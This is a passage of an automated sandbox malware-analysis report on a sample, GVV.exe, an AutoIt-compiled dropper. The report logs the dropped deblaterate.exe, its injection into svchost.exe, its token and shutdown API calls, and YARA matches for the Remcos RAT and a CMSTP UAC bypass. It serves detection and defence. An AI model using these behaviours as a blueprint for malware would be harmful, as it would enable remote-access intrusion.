SkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c3aec12a-0
          Source: deblaterate.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_8e876750-1
          Source: deblaterate.exe.0.dr | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6e140100-6
          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Users\user\Desktop\GVV.exe | Process Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017D5EB: CreateFileW,DeviceIoControl,CloseHandle
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00171201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00182046
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00118060
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00178298
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0014E4FF
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0014676B
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001A4873
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0013CAA0
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0011CAF0
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0012CC39
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00146DD9
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0012B119
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001191C0
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00131394
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0013781B
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00117920
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0012997D
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00137A4A
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00137CA7
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0019BE44
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00149EEE
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_01A83690
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0047BF40
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E2046
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00478060
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004D8298
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004AE4FF
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004A676B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00504873
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0047CAF0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0049CAA0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0048CC39
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004A6DD9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0048B119
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004791C0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00491394
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0049781B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0048997D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00477920
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00497A4A
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004C3CD2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00497CA7
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004FBE44
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004A9EEE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_01783690
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0043E0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0041F0FA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00454159
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00438168
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004461F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0043E2FB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0045332B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0042739D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004374E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0043E558
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00438770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004378FE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00433946
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0044D9C9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00427A46
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0041DB62
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00427BAF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00437D33
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00435E5E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00426E0E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0043DE9D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00413FCA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00436FEA
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 14_2_01573690
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0043E0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0041F0FA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00454159
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00438168
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004461F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0043E2FB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0045332B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0042739D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004374E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0043E558
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043877015_2_00438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004378FE15_2_004378FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043394615_2_00433946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0044D9C915_2_0044D9C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00427A4615_2_00427A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0041DB6215_2_0041DB62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00427BAF15_2_00427BAF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00437D3315_2_00437D33
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00435E5E15_2_00435E5E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00426E0E15_2_00426E0E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043DE9D15_2_0043DE9D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00413FCA15_2_00413FCA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00436FEA15_2_00436FEA
          Source: C:\Users\user\Desktop\GVV.exe Code function: String function: 00130A30 appears 46 times
          Source: C:\Users\user\Desktop\GVV.exe Code function: String function: 00119CB3 appears 31 times
          Source: C:\Users\user\Desktop\GVV.exe Code function: String function: 0012F9F2 appears 40 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00402213 appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 004052FD appears 32 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00434E10 appears 108 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0040417E appears 46 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00402093 appears 100 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00434770 appears 82 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00401E65 appears 68 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00401FAB appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00411F67 appears 32 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 004020DF appears 40 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00457A28 appears 34 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 004484CA appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 004458D0 appears 56 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 004046F7 appears 34 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: String function: 0048F9F2 appears 40 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: String function: 00479CB3 appears 31 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: String function: 00490A30 appears 46 times
          Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
          Source: GVV.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
